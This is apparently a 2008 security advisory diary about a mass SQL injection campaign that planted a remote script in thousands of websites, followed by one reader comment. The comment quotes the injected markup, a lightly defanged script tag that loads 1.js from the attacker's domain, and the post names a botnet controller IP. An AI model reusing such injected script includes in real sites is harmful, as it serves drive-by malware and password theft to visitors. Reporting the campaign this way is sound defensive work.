Hundreds of thousands of SQL injections

Published: 2008-04-24
Last Updated: 2008-04-25 13:47:50 UTC
by donald smith (Version: 2)
1 comment(s)

Hundreds of thousands of SQL injections UPDATE.
It is recommend that you block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.

1.js is the file they are currently injecting. That could change and has been injected into thousands of legitimate websites. Visitors to this website are “treated” to 8 different exploits for many windows based applications including AIM, RealPlayer, and iTunes. DO NOT visit sites that link to this site as you are very likely to get infected. Trendmicro named the malware toj_agent.KAQ it watches for passwords and passes them back to contoller’s ip.

The crew over at shadowserver has published additional information related to SQL injected sites. They included the botnet controllers IP address 61.188.39.214 and a content based snort signature for the bot control traffic that is not ip dependent. The bot controller is alive and communicating on port 2034 with some infected clients at this time.
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080424
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080313

They have hit city websites, commercial sites and even government websites. This type of injection pretty much null and voids the concept of “trusted website”. or "safe sites".

The register covered it stating their search returned 173k injected results:
http://www.theregister.co.uk/2008/04/24/mass_web_attack/
The number I received doing the same search was 226k. Those are not all unique websites. Many sites got hit more then one time.

Lou a self described “accidental techie” has been discussing it as they have been reinjecting this into his database/website “every other day”. http://www.experts-exchange.com/Database/MySQL/Q_23337211.html
Websense has good information on it here:
http://securitylabs.websense.com/content/Alerts/3070.aspx

We covered the injection tool, the methods to prevent injections and other details here:
http://isc.sans.org/diary.html?storyid=4139
http://isc.sans.org/diary.html?storyid=4294

1 comment(s)

Comments

Anyone else notice the multiple injections are starting to overwrite each other or get injected in the wrong place?

<title>[title removed]<scri<script src=http://www.nihaorr1<DOT>com/1.js></script> [title removed]<script src=http://www.asp<script src=http://www.nihaorr1<DOT>com/1.js></script></title>

Diary Archives